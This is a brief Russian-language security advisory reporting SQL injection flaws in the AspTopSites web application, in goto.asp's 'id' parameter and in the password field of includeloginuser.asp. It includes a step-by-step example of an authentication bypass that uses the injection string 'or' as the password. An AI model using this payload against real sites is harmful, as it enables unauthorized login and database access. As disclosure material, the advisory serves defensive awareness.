Программа: AspTopSites

Уязвимость существует из-за недостаточной обработки входных данных в параметре "id"
сценария "goto.asp" и в поле пароля в сценарии "includeloginuser.asp". Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Пример:

http://[host]/topsites/default.asp <— view listings
http://[host]/topsites/goto.asp?id=43 <— mouseover id value
http://[host]/topsites/includeloginuser.asp <— login here
user: [ id value ]
password: ‘or’



Оставить мнение